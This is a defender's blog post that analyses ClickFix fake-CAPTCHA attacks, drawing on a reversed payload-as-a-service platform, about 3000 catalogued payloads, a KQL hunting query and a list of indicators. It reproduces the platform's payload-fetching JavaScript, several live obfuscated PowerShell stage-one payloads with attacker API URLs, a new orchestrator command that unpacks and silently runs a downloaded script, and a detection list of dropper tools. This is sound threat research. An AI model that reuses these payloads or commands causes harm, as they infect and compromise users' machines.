KQL Query
Posts Categories whoami Projects Events KQL News
KQL Query

Contents

ClickFix: The Gift That Keeps On Giving

 included in Threat Hunting Detection Engineering Incident Response SOC
   2097 words   10 minutes 

In the beginning of June I presented the session ClickFix: The Gift That Keeps On Giving at OrangeCon. ClickFix emerged around 2024 and saw a 517% increase in 2025 as described by SANS, the effectiveness of this technique is something we will have to deal with for the upcoming years. Before diving into technical details, it’s important to understand why ClickFix is so effective. The attack exploits fundamental user behaviors and training:

  1. We are trained to solve captcha challenges.
  2. There is a wide range of legitimate types of captchas available.
  3. We are used to follow instructions.
  4. Non technical audience lacks understanding of the impact of pasting a command.

Due to the popularity of the technique ClickFix methods have got their own MITRE ATT&CK technique T1204.004: User Execution: Malicious Copy and Paste.

This blog presents the findings and research conducted in preparation for the OrangeCon session. For the session around 3000 ClickFix payloads are investigated and multiple ClickFix platforms are reversed to shed some light on the ongoing operations.

Interested in the full session? Watch the recording on YouTube

What Is a ClickFix Attack? Understanding the User Execution Technique

ClickFix is an initial access/dropper technique based on 3 steps as described in the flow by BitDefender:

  1. Deception: The user is shown a fake verification (CAPTCHA) page that instructs them to follow steps to continue.
  2. Clipboard Injection: Malicious JavaScript silently copies a command into the user’s clipboard.
  3. Execution: The user pastes and runs the command, unknowingly executing malware that connects to the attacker’s infrastructure.

/images/ClickFixGift/ClickFix101.png
ClickFix Steps (Right part of image source: BitDefender)

ClickFix Attack Delivery Methods: Email Campaigns and Malicious Websites

ClickFix campaigns reach users through two distinct methods:

Social Engineering Approach

  • Threat actors craft email messages designed to appear urgent or legitimate to lure victims.
  • Recipients are directed to dedicated ClickFix infrastructure.
  • More likely to be targeted.

Browsing Based Infections

  • Users conducting routine search engine queries inadvertently land on malicious pages.
  • Compromised WordPress installations often serve as hosting platforms for ClickFix pages, vulnerable WordPress plugins are frequently exploited to inject malicious CAPTCHA overlays.
  • A broad shotgun approach that requires traffic on the compromised WordPress sites.
  • Most often the cause of a ClickFix infection.

ClickFix Execution Techniques: Windows Run and Windows Terminal

As ClickFix evolved, threat actors developed different execution methods as detection and prevention evolved. For this blog we only deep-dive into the Windows based methods, but know that macOS ClickFix campaigns are also active and effective. There are two distinct ClickFix methods used this day Windows + Run and Windows + X.

/images/ClickFixGift/Methods.png
ClickFix Windows + R and Windows + X

Windows + Run (Run Dialog)

The original fake captcha pointing to Windows + R emerged in 2024 and saw rapid adoption through 2025:

  • Triggered via Windows + R keyboard shortcut
  • User is prompted to paste a command into the Run dialog
  • Executes as a child process of explorer.exe
  • Process chain: explorer.execmd.exe, powershell.exe or any other lolbin with an outbound connection

/images/ClickFixGift/WindowsRunProcMon.png
Windows + R Parent Child Relation

Windows + X (Power User Menu)

A newer specialization emerged in 2025 and rapidly gained adoption into 2026:

  • Triggered via Windows + X keyboard shortcut
  • Lures the victim into typing I or selecting Terminal
  • Opens the Windows Terminal application
  • PowerShell executes by default as the shell environment
  • Process chain: WindowsTerminal.exepowershell.exe

The shift toward Windows Terminal execution complicates detection logic, as Windows Terminal operations appear more legitimate than direct Run dialog execution and do not leave a RunMRU Registry entry behind.

/images/ClickFixGift/WindowsXProcMon.png
Windows + X Parent Child Relation

Reverse Engineering ClickFix Platforms: JavaScript Injection and Payload Delivery

To understand the state of ClickFix in 2026 it was time to perform research. I wanted to know the answers on the following questions:

  • How are payloads delivered to the clipboard?
  • What stage 2 loaders are used to deliver the payloads?
  • How have the obfuscation techniques evolved over the past two years?

The performed research is done by reverse engineering ClickFix payloads and performing data analytics on the 1000s of ClickFix domains and payloads added to the ClickFix Hunter project.

JavaScript Obfuscation and Clipboard Injection

As any advanced reverse engineer whould do developer tools in the browser are used to identify how payloads are injected into the clipboard. The screenshot indicates our assumption, a compromised WordPress site is hosting a fake captcha.

ClickFix pages use JavaScript to:

  1. Detect browser and operating system characteristics
  2. Craft OS-specific payloads
  3. Inject payloads into the user’s clipboard
  4. Prompt users to paste and execute
  5. Deliver payloads in the language of the visitor, support for 25 different languages.

/images/ClickFixGift/DifferentLanguage.png
ClickFix platform is supporting 25 different languages

ClickFix Payload-as-a-Service (CPaaS): Scalable Malware Delivery Infrastructure

The JavaScript characteristics are not suprising and expected, but that is not all what is included in the script. One of the more notable findings in researching this ClickFix operation is the existence of structured Payload-as-a-Service (CPaaS) infrastructure. This is single payload that is loaded for each visitor, it is organized, API-driven, and designed for scalability.

/images/ClickFixGift/CPaaS.png
CPaaS: ClickFix Payload as a Service

Threat actors have implemented backend API endpoints that:

  • Accept requests for payloads
  • Use access tokens for authentication
  • Generate unique, obfuscated payloads dynamically
  • Return different obfuscation methods for each request
  • Log metadata including timestamps and request parameters

The payload is dynamically collected in the function fetchPayload().

/images/ClickFixGift/FetchPayload.png
JavaScript Fetch Operation for Payload Retrieval

// cloudflare.js — ClickFix Cloudflare CAPTCHA module
// Loaded by JS loader from API server: ?a=js&mode=cloudflare
// Exports via window.__BW_MODE_RUN__

window.__BW_MODE_RUN__ = function(ctx) {
    // ctx contains: panelBaseUrl, apiBase, apiUrl, logUrl, tokenUrl, downloadUrl,
    //               mode, os, browser, country, storageKey, cfg, contractConfig

    // Fetch payload (PS command) from API server
    var currentPayload = '';
    var captchaMode = 1;
    function fetchPayload() {
        try {
            var url = ctx.downloadUrl || (ctx.apiBase + '/api/index.php?a=init');
            try {
                var _ps = new URLSearchParams(window.location.search);
                var _src = _ps.get('src') || window.location.hostname;
                if (url.indexOf('src=') === -1)
                    url += (url.indexOf('?') !== -1 ? '&' : '?') + 'src=' + encodeURIComponent(_src);
            } catch (ee) {}
            var xhr = new XMLHttpRequest();
            xhr.open('GET', url, true);
            xhr.onload = function() {
                if (xhr.status === 200) {
                    try {
                        var data = JSON.parse(xhr.responseText);
                        if (data.token)
                            currentPayload = data.token;
                        else if (data.payload)
                            currentPayload = data.payload;
                        else
                            currentPayload = xhr.responseText;
                        if (data.captcha_mode) {
                            console.log('[CF] captcha_mode from init:', data.captcha_mode);
                        }
                        if (data.captcha_mode === 2 && captchaMode !== 2) {
                            captchaMode = 2;
                            rerenderSteps();
                        }
                    } catch (e) {
                        if (xhr.responseText.length > 5)
                            currentPayload = xhr.responseText;
                    }
                    syncCfId();
                }
            }
            ;
            xhr.send();
        } catch (e) {}

        // Also try cfg payload
        if (ctx.cfg && ctx.cfg.payload) {
            currentPayload = ctx.cfg.payload;
            syncCfId();
        }
        if (ctx.cfg && ctx.cfg.captcha_mode === 2)
            captchaMode = 2;
    }

Analyzing ClickFix CPaaS APIs: Dynamic Payload Generation and Obfuscation

If you do security research you often go on side-quests, this research also had one related to payloads. I did not expect to find a CPaaS infrastructure on a random clickfix campaign, but once I did it I needed clarrification. It was time to do a little bit of digging to understand how it worked

To understand what payloads are returned I requested 100 payloads from the CPaaS platform, a subset of the responses is added to this blog. These 100 payloads resulted in the following conclusions:

  • 100 unique payloads observed (no payload reuse)
  • Multiple obfuscation techniques employed dynamically (Base64, AES, TripleDES, Rijndael, Deflate)
  • Client-side deobfuscation always results in identical malicious code
  • PowerShell RunSpace for memory and obfuscation reasons

In this particular campaign the obfuscated payload is unique, but once the code is deobfuscated the payload returns the same values. It is a matter of time until this will adjust to deliver dynamic deobfuscated payloads.

/images/ClickFixGift/CPaasResultsDeobfuscated.png
Deobfuscated Payloads

[
    {
        "index":  1,
        "timestamp":  "2026-05-14T13:53:21.2886856+01:00",
        "source":  "https://babybon.cfd/api/index.php?q=IwvO43BY7yTFPPxkFys",
        "payload":  "$record9m=[Convert]::FromBase64String(\u0027jFcGdKEaozRvCRFaOJ+aDH1YWl73BIcjiGdhjvrGeBU=\u0027);$record9m=[Convert]::FromBase64String(\u0027I1c58dS81nJ1bkLJc3XOGg==\u0027);$packet4k=[Convert]::FromBase64String(\u0027Sj0seqdHEUqapplbw9inaUNqWw4S8kv9pOS+tbUlyH/tqtk8pRz5YApFwJyG/hpkdIh+IjPmy+CeEcq26gjScStKoBH/8pQpAAkmzmncRRq3cHwdH1UU3ebDF65vdOfGcjux4nWTocZ+1XmAbleOiAaNQdWcopUAo5HElvBQCqnRQOdo/p0tYlKWUJfEtlEXDnqWLwP3/2mCtY+5TH0CGWkevsq+8tmVagIaUDStopIsf+7GMKywNaNJ7oU+0JbKBJYNvhaJzziaQYvp9DYxGArit57p3Dvn+6jezsdFRMu1ueXeV+053z9YC6nnDGSdHJAK2J5vif5e4YBDgAw2yLmwp++ksPLCUJPW7CI+jjtq8Hq+Y2IJJa4e8QUjgTwKrn1M7GWurTtAXp/YXIlmxgoPCMkgRXsuZIlruhzGmJ2V9boDGpoVEgLYZbxMOTiiUZCxtW0DGLcw6iY3JyNVGfuj81fZDuesCryxOLHffQ/yH2rTtBH0mHgBTYifEZZ8+ALVH6Id2qD9E971ehDI57A4DAvxw1WKRCG6PaWNAAec0Qpp59BQYqSJvs0MLulwSm3WVr09l1zEAC8dK1X1WYtG45tzZ/3VJwufRdyyTSl4t/WH8ZM9TZiQuPHHPKmhIoZec4bgc064jh0dvMNNs9ZdDSzk7ZIU6tk9Ne/lpoifF4QaUzi11IcG3elUXuGChQKqMspHNODSpOxVYHK8wyCkXOu2M6md3yvGjz4QOHCudUl0dIre/qeoErIEKleztkYmwWeOM5ZX4FAuEeTINSy3oCHkq31CBiNjNWl/r2YmOuQOseD7rTH8fQVwydSw5rmP6m7NyCTkAJM4umBKgSE1E/qvFg/pidGIj/XO77wzyMzTXp6eFxQ/314Jc9OZsBaqhxe5JtIJn7BnY4dwaSvHWDY4Siao9nr+DXm2rmdVp/7m9hMqon+vWJdRxhC/sL5pDOs+hpU1AinqnYOGhWP2c9aUH/d0LZFHgU2YIUS7ADsjivxuFFKHw9x2/ItCKBWrrjP6Lj/NAUdUS6Qgdg02U0WFzBkMcuwiTYxiPWdBvSZFb7imd4U1s/kC40uKnYO/+2tEDvpzSXC+sCNA0SzTdqMZSpi6EBAMOPd4PoonbpUxE38/6/arb5o9sJSW\u0027);$stream9m=[Security.Cryptography.Aes]::Create();$stream9m.Key=$record9m;$stream9m.IV=$record9m;$stream9m.Mode=\u0027CBC\u0027;$stream9m.Padding=\u0027PKCS7\u0027;$block0g=[Text.Encoding]::UTF8.GetString($stream9m.CreateDecryptor().TransformFinalBlock($packet4k,0,$packet4k.Length));$stream9m.Dispose();$rs=[runspacefactory]::CreateRunspace();$rs.Open();$pp=$rs.CreatePipeline();$pp.Commands.AddScript($block0g);$pp.Invoke();$rs.Close();exit"
    },
    {
        "index":  2,
        "timestamp":  "2026-05-14T13:53:27.3626484+01:00",
        "source":  "https://babybon.cfd/api/index.php?q=IwvO43BY7yTFPPxkFys",
        "payload":  "$content5e=[IO.MemoryStream]::new([Convert]::FromBase64String(\u0027jVNdb5swFP0rfkAlqCUpIVlCEZq6fmydujQqmfow7cHYl8aqsZm5SYuy/PddsixaN03aCzKccy7Hx8fe3NlHB00zd1CCAyMg83OlwaBuL6xBZVbgp1/ytkGo+jPAfg5urQTMrTL4iRv+CO7r2VkOYuUUtjQPrbA6ey15DS7aGkiz0E00TD08cG/u+nOOS4IubFUoA71fyJVZK2dNRb4IfQ94bbUE17F7/q0VXJ/XtVaCo7LmkiP3gxN/AVXtn/w9nOT33EhbXdNGZ7yCXhCkM3gOb4jHds/OIbtUDgRa17KwUzIPWXhtnYDvdysMZyutU6/MPlIQB7z3X3879vvwAn6QevYpO01L63qeooWnWKiRxSwkAQuNRUYM+nx8HGzQtZsbs7ZPED5AcQ/fVtCQoc9OMX+JWDdng0HBi7awpi9KOeC1Gigj4aVfL+u3PJP6CElssqngvEzGsZwmo8m0mPJJlERQxMNhMhZRNOFxdFqMYy6S03EiR1y+SXgEcTIBERdDOTpqnMiEtitZau7gqLISfnv3WUjxdJtlXkn+GnjHGyXm3DXKPKaq7C3I+D6xMth0GURb0A1scuQOw1wD1Cyk0lgjGzbcbulYxfKfaDdyl9XrwcEGXhRu058yqp6gmtMBkrE9hYUPFJB9zrElsx+UlGDSLuZ7qOwa9nW4VQiO64Nm1wAWXjln3bno+sb+vDB7w9v0Bw==\u0027));$response3f=[IO.MemoryStream]::new();[IO.Compression.DeflateStream]::new($content5e,[IO.Compression.CompressionMode]::Decompress).CopyTo($response3f);$rs=[runspacefactory]::CreateRunspace();$rs.Open();$pp=$rs.CreatePipeline();$pp.Commands.AddScript([Text.Encoding]::UTF8.GetString($response3f.ToArray()));$pp.Invoke();$rs.Close();exit"
    },
    ...
        {
        "index":  98,
        "timestamp":  "2026-05-14T14:04:16.8138217+01:00",
        "source":  "https://babybon.cfd/api/index.php?q=IwvO43BY7yTFPPxkFys",
        "payload":  "$result3f=[Convert]::FromBase64String(\u0027Ktz7+VB4Dgh+S56QnsQ9b+yTEZcDEmzCgWdqN5NP1pg=\u0027);$chunk9m=[Convert]::FromBase64String(\u0027yzRZXgDE5aS/KI7N/mBfuQ==\u0027);$stream2b=[Convert]::FromBase64String(\u0027/bFMPD/YP0D26aQPJnYV8P0QL5S8pn4WHRmqijcKp7cu2w5nU59xIRkCp+xhWyePp1XY7zgh99ONxTaB7riYIsIGQNlif6k6CnOfX+QYV3mPCnGUV3+2tqepvx8cAzbBQcakOtFOUe6qOh/O/2uIvneoxv+T7swbXdOXqgFJYFeYxPGRXiQ7lEhr15FNXSc7sL85Fq+Pji3Nbrg9DP/FCi0eTaKECGBDxxEaTlbTGESGrqUO+IMbrD9MtiYmGJksbKfohH5Pa9+w9voMW/Ou9kC5KIdId/sM7y+qPVWvKOS0smI0FCvr1mqyV/unMChYe0/npvXkFMoPdqd8ahS1zWokuYv6cc0vBvSLKh/jyNIwn/++3aVbdJDVUZxwQd40PeXrHTWeEXNM3rqZBx4oBwwGBqMaWFd1dfLqOds5KllumpzG3ZgVO2++h4AcjCC/j4+syH8J+krOuCtol8wh99XlhDU9Oz4z4WfyCBdqaN0FT9Vci20Wp2XLS2/rHGtZNajI9k+bisB4JOKZhPU+ApdlIDAQp85GiwVe2jacP0SQ5vqNgru1q6IOgEMyCRAKWLM5+1GVva/E/Yc/DfbCl52pvFyxVkBlR7bbywh5WuPFTUAJIaI1ztjJknQIh+Nv/WvpFFn7fRixIgC+L0158+6wXh6YAVhtS566wrgZkRvvZlA4GBOEFGpEtY9bIktOJ0FV4+3gjPpiPmKp0ENuzMlgNIaj8mkK3xkZfaftAs1jgLAq5a9+N92pj9NicsDgwvPQRdo6/Ot4qIQFVL8UdcAt6tf4L9SCZYB6+S4PM8l/K1Uq4bmSrDP4MKC8Vlb+oNjuQfAGJdrvfXXQyy4vJw8gSK/QZ+j+DxoWYbDrWbARIOIBO8eCGjuK1mtm3HsueyBqdD/ckcnjn3wxyrj3yS/oWR2tCioFceaYA8nKaDY1v+0bLe2bBmsMTkYzGamjruI9lueAZTlpSLPmQ88TLu70zYcLHAlcdBcgNXFKnix2T6Zv7065bIXwpDlqFkWa+i7x6eTi+uqiysZbxNIhtJpLrRgPjS3OKleta8SoxVgz0mslu+JS8yRIOSx6/2siNGZbFymFMslWuSDS1FNx7MsXUeo8ZRGvzSaEYajjjg574M1QbsW3wqMmSXHF3rQX\u0027);$content9m=[Security.Cryptography.Aes]::Create();$content9m.Key=$result3f;$content9m.IV=$chunk9m;$content9m.Mode=\u0027CBC\u0027;$content9m.Padding=\u0027PKCS7\u0027;$result5e=[Text.Encoding]::UTF8.GetString($content9m.CreateDecryptor().TransformFinalBlock($stream2b,0,$stream2b.Length));$content9m.Dispose();$rs=[runspacefactory]::CreateRunspace();$rs.Open();$pp=$rs.CreatePipeline();$pp.Commands.AddScript($result5e);$pp.Invoke();$rs.Close();exit"
    },
    {
        "index":  99,
        "timestamp":  "2026-05-14T14:04:19.8957583+01:00",
        "source":  "https://babybon.cfd/api/index.php?q=IwvO43BY7yTFPPxkFys",
        "payload":  "$chunk7x=[Convert]::FromBase64String(\u0027lVdZkhRmBSHuK0qJ2XyABBPS4rqZzRShA+H5E7DDIP8=\u0027);$segment4k=[Convert]::FromBase64String(\u0027I7LvI/Lh7Jb0o8r3DI26Ug==\u0027);$stream5e=[Convert]::FromBase64String(\u0027VbYryylvpDAta6p0G04cnjZnrOZs1uRAV/nalkY06oeM5JGZbtbOwOMyuVGj/vLatFsjNo9RdPnCkw7X1NVrd0zCAAb++V5x4Y6Sbv5SNM3R+/kal1y3R3jvvOMG7oHWiKIyA+xujZ4sGX7T7kV+u6dNmf7wN9VwnNh/h/u+Re4hgahweaJ9YTr1ux/11krvys74Rh5enVxdY3crfTK7vFZ/MCSIwAGFqZ+x9BYk3cCBmbu2zKbht0DVNMVwsQf5kKsGbjKTUGfIHfuN6qfj2alinBRpmU58F/YG04jV7T0IiLLmTtjFiK25HvPFl9mHlP3443XoD3TnxcvibDV8wHllHMP9Gggn/dvmMmgaZ8S8HeBg3kF+MKyLix+BSe8XTkcAS3mx54ci8xzyXTpCP2GuKWdtQYpruReApUztkhDViDaEZArS8+BPzpN2XWPbAtpR54V9Avkfy0/eY9o3oHmXPopd0zddMfc08iacOoKfhS7mkiyp2nZbUAjPCVf2GhtOaBzOPlf9mg+SC6PIfVkIVl/4zAj0xPJmTxXH8DevqjfyUIuFKRdz/U2AdN7EuvOTxLnFU0BE4RP05/lXCipJMuWNIAobunt8EwQl+OTgb4dXkpFbrFTbZ59PdIDm6Y+4RCDixtz+bEatPuBhbUpezO6MCVxkeCU7xJzIIQiQQQWtP5ipepOi2U9K6Ikhr7ShwGoZFIOxYBVYkZWE8HMGygBCDznA41Ydu4FWeIkcOiYhntwFVTjGWHHjv04jeDQbgtqfVtET19ikrNAKOWnmeFfFu4PXOfGClXhQ0Z9UiDdraKnB2fNz5WlfKSDMRLgFoW9JSDP5Xe4lnsFoUisDv4r/M6FzfAltNuHqOAle11mkRuWwN1a/1HFuzaYRfxusQAu+v6u7nP4YE15l23MxWApw++uda3RgkU4S+kEtdSovnvbDn0W3vYOZwHt3Zf+3M4XV3GmwEo7bw40owZExbUhrzR4GQzYzAUOctYoAuBFx+9THKfJhQ1v+FfW0FZQkgFc3W6q8S+cK/Q825J65W2CgWpnRDzQtZOZZbfRx3fkD4faETXxnyVWTvkkjKYc028NzjpGWmjmvIrgQrNGmiuGbbfUihN0KAzOZhuyvVYNppoMCD6Nu0fjnydFs\u0027);$buffer5e=[Security.Cryptography.Aes]::Create();$buffer5e.Key=$chunk7x;$buffer5e.IV=$segment4k;$buffer5e.Mode=\u0027CBC\u0027;$buffer5e.Padding=\u0027PKCS7\u0027;$stream8d=[Text.Encoding]::UTF8.GetString($buffer5e.CreateDecryptor().TransformFinalBlock($stream5e,0,$stream5e.Length));$buffer5e.Dispose();$rs=[runspacefactory]::CreateRunspace();$rs.Open();$pp=$rs.CreatePipeline();$pp.Commands.AddScript($stream8d);$pp.Invoke();$rs.Close();exit"
    },
    {
        "index":  100,
        "timestamp":  "2026-05-14T14:04:22.0036431+01:00",
        "source":  "https://babybon.cfd/api/index.php?q=IwvO43BY7yTFPPxkFys",
        "payload":  "$data4k=[Security.Cryptography.TripleDES]::Create();$data4k.Key=[Convert]::FromBase64String(\u0027KF0oKBfK7z4Uit01oqzmmY7U8o+v2kc2\u0027);$data4k.IV=[Convert]::FromBase64String(\u00273cSSMwvFufk=\u0027);$data9m=[Convert]::FromBase64String(\u0027YJFgOG3YdqmRbA3NCp5m4RVXZl20vAGo2jafyBf8mDiIM+IrVW4WumUVw6EZ6R8uKUDQS7H2pWy8zczY2f1p+28wBKgJFpYz2HoFb95wmL9EOVO9+qyQ3HDTv/Em+K6GJE9osD1HxE00QGAfjtDCV5BEsYQazjmwQb0xXSmwz798bdhyYCN2LUEcFoNt3HjF6oxy5ZmrTPZ2+iZ3rNpkNDhBmGdxo6Ea7LkDzOiqvrKgzqHWLVxbwqf/rgTD5W/1hEbSYvW6iccLVOOdfbIK4AZ5wRQLOa2KJxtwcj0tewZPqw06SVZgatJf/EVQQrh7b9GpNapdN8KkdT2nmJZLxbprtw5CBugO2EZmQQAOmB/43ZPsbKyy0JlAXW38hP18pZFnri5Mj+m5hGMcr61RwEVYXuiY4FFNodZ43OZT4+/a2iI6Y9b8U1qMtEbxf1Cl8DQFvUkf6Z+I9wg96NMrl5sTrh7thaXHTqnf5ZDVacqNMr2FxvNts+KsZ/fhpmdr+UykiNXTS7MIBRdoB7At/Wiz91Z7zrTliJEsN8pG2PSbyjwn7i+vi7Z53P+/Rqe+n1EA3JTOUJrRfKv8xnWLnv2YYZmeSSOVmE0kqa5s0V6WszdgMDluVmGNdrLr2/M0L1HbPdlGx/g6s3c3LK4Xvbz/6xkrmDMod/i3eP1ovxVqc4mzXVpZjuHQkvL9akGYSuZcoBuLPsftq3bnLJoXETb8e9vsfI3CUpqQF718AdvfxQ8Omx9m9/SAgUsSe2cMjF0okyXml1xVQ9a5zsbhxDIc8Xh0nJpH9SLT4Bwm8svFUyba1a3CnKp+gzSf45RMWXaLyUuKW1K428H7mj4hN0XdUWU5xqs/X5S0p1JyujSUcZwZ8AONVsekgMD8dIm6DyItv52WZOsZ6WJfbhAb4Oar+RGjkN8RcYBbhHWO4He6/RbIpZq+biIlslF071GwHNaP40XzyOsFMYoMQrJGZAKvoEK4tGKFYEtv12wyj7fcSu5crfyIG83lgh8YxIZU6Pj2UX46x78frBAdtqEdzTvtUJcvhBDcJnR7e2yhv9H3s4KY23I1iWWtpVQPDyIb3nqII1HH0b699sEoeupetFTpftHJFFZ5rX/JQwNdYzWHHs5If7s9rI1SAvKqIJ2e\u0027);$result0g=[Text.Encoding]::UTF8.GetString($data4k.CreateDecryptor().TransformFinalBlock($data9m,0,$data9m.Length));$data4k.Dispose();$rs=[runspacefactory]::CreateRunspace();$rs.Open();$pp=$rs.CreatePipeline();$pp.Commands.AddScript($result0g);$pp.Invoke();$rs.Close();exit"
    }
]

ClickFix Stage 2 Loaders: Living Off the Land Binary (LOLBIN) Abuse

The second question I had was what stage 2 loaders are used to deliver the payloads? To research this the great ClickFix Hunter project is used. This project shows which domains were compromised by clickfix and which payload they delivered. You can download the complete dataset in JSON or XLSX for analysis.

To answer the question I downloaded just over 3000 entries from the ClickFix Hunter project and uploaded them into an Azure Data Explorer cluster. The blog Incident Response Part 2: What about the other logs? explains how you can ingest the data into Azure Data Explorer. Once the data is uploaded you can leverage the query below to perform analysis, in my case the name of the table is OrangeCon_ClickFix.

let dropper_tokens = dynamic([
    "powershell", "powershell.exe", "pwsh", "pwsh.exe", "iwr", "iex"
    "cmd", "cmd.exe",
    "msiexec", "msiexec.exe",
    "curl", "curl.exe",
    "wget", "wget.exe",
    "rundll32", "rundll32.exe",
    "regsvr32", "regsvr32.exe",
    "wscript", "wscript.exe",
    "cscript", "cscript.exe",
    "schtasks", "schtasks.exe",
    "bitsadmin", "bitsadmin.exe",
    "mshta", "mshta.exe",
    "certutil", "certutil.exe",
    "wmic", "wmic.exe",
    "net", "net.exe",
    "ssh", "ssh.exe",
    "syncappvpublishingserver.vbs"
]);
OrangeCon_ClickFix
| extend Commandline = tolower(commandline)
| extend TargetOS = case(
    Commandline has @"/bin/bash", "MacOS",
    "Windows"
)
| extend Parsedcommandline = parse_command_line(Commandline, "windows")
| extend DropperPrograms = set_intersect(Parsedcommandline, dropper_tokens)
| where TargetOS == "Windows"
| project-away commandline
| extend DropperPrograms = array_concat(DropperPrograms, pack_array(
    iff(Commandline has "iex", "iex", ""),
    iff(Commandline has "cmd", "cmd", ""),
    iff(Commandline has "bitsadmin", "bitsadmin", ""),
    iff(Commandline has "curl", "curl", ""),
    iff(Commandline has "syncappvpublishingserver.vbs", "syncappvpublishingserver.vbs", "")))
| mv-expand DropperPrograms
| where isnotempty(DropperPrograms)
| summarize count() by tostring(DropperPrograms)
| extend Matches = dynamic([])
| extend NormMatches = dynamic([])
| extend NormMatches = iff(DropperPrograms has_any ("powershell", "powershell.exe", "iex", "invoke-expression", "iwr", "invoke-webrequest"),
                           array_concat(NormMatches, dynamic(["powershell"])), NormMatches)
| extend NormMatches = iff(DropperPrograms has_any ("cmd", "cmd.exe"),
                           array_concat(NormMatches, dynamic(["cmd"])), NormMatches)
| extend NormMatches = iff(DropperPrograms has "bitsadmin",
                           array_concat(NormMatches, dynamic(["bitsadmin"])), NormMatches)
| extend NormMatches = iff(DropperPrograms has_any ("curl", "curl.exe"),
                           array_concat(NormMatches, dynamic(["curl"])), NormMatches)
| extend NormMatches = iff(DropperPrograms has "syncappvpublishingserver.vbs",
                           array_concat(NormMatches, dynamic(["appv_sync"])), NormMatches)
| extend Final = iff(array_length(NormMatches) > 0, NormMatches[0], DropperPrograms)
| summarize Total = sum(count_) by Stage2Loaders = Final
| sort by Total

LOLBin Usage Statistics

After the content of the clipboard has been executed, ClickFix payloads use Living-off-the-Land Binaries (LOLBins) (T1218) to download and execute secondary stages. PowerShell, cmd and msiexec are the most common to download additional payloads.

/images/ClickFixGift/Results.png
Stage 2 Loaders Used in ClickFix Campaigns

LOLBinCountPercentage
PowerShell1,17039.0%
cmd1,16938.9%
msiexec1,01933.9%
curl2688.9%
net1836.1%
mshta1244.1%
AppV Sync (syncappvpublishingserver.vbs)441.5%
wscript371.2%
ssh80.3%
rundll3240.1%
regsvr3220.1%
bitsadmin10.0%
wmic10.0%

New ClickFix Payload Techniques: How Attackers Continue to Evolve

As defenders adapt their detection and prevention strategies, threat actors continue to modify ClickFix workflows to bypass existing controls and increase the success rate of their campaigns. During the research for OrangeCon, a new payload delivery method was observed that shows how quickly ClickFix operators adjust their techniques when defensive measures evolve. The observed technique is effective because the malicious content is no longer directly placed in the clipboard, instead, it uses a trusted file location and a legitimate execution flow to reduce the chance of detection by security controls.

This new payload delivery method is using:

  1. Fake Captcha
  2. Download file to downloads folder
  3. The system clipboard is populated with an orchestrator string.
  4. Execute clipboard pointing to file in downloads folder, goes around amsi as the text is not malicious
powershell -C "$t=$env:TMP;Move-Item \"$HOME\Downloads\tmp.zip\" \"$t\7947.zip\";tar -xf \"$t\7947.zip\" -C \"$t\";conhost --headless powershell -ExecutionPolicy Bypass -File \"$t\tmp.ps1\" #   "*  I am not a robot reCAPTCHA Verification ID:7947  *"

/images/ClickFixGift/DownloadsFolderMethod.png
New delivery technique using Downloads folder

Indicators of Compromise

During this research multiple Payload API servers were discovered. These are hosted on the following domains:

  • Comicstar[.]lat
  • Babybon[.]cfd
  • merkantalolol[.]asia

Note that a connection to these domains is not equal to a successful payload execution, it is only highly likely that a payload was put in the clipboard of a user.

Conclusion

ClickFix is here to stay! ClickFix demonstrates that the human element remains one of the most effective attack vectors, especially when combined with legitimate system functionality and trusted binaries. Both Threat Actors as well as Red Teams will keep ClickFix methods in their attack arsenal and continue to develop new techniques. To keep countering the attacks defenders need to stay agile and continuously improve prevention, detection and response activities to combat the fast changing delivery methods. Open source projects such as the ClickFix Hunter project should be reviewed periodically to understand the latest delivery methods.

Related Blogs

Questions? Feel free to reach out to me on any of my socials.

Updated on 2026-06-30
 PowerShellKQL
Back | Home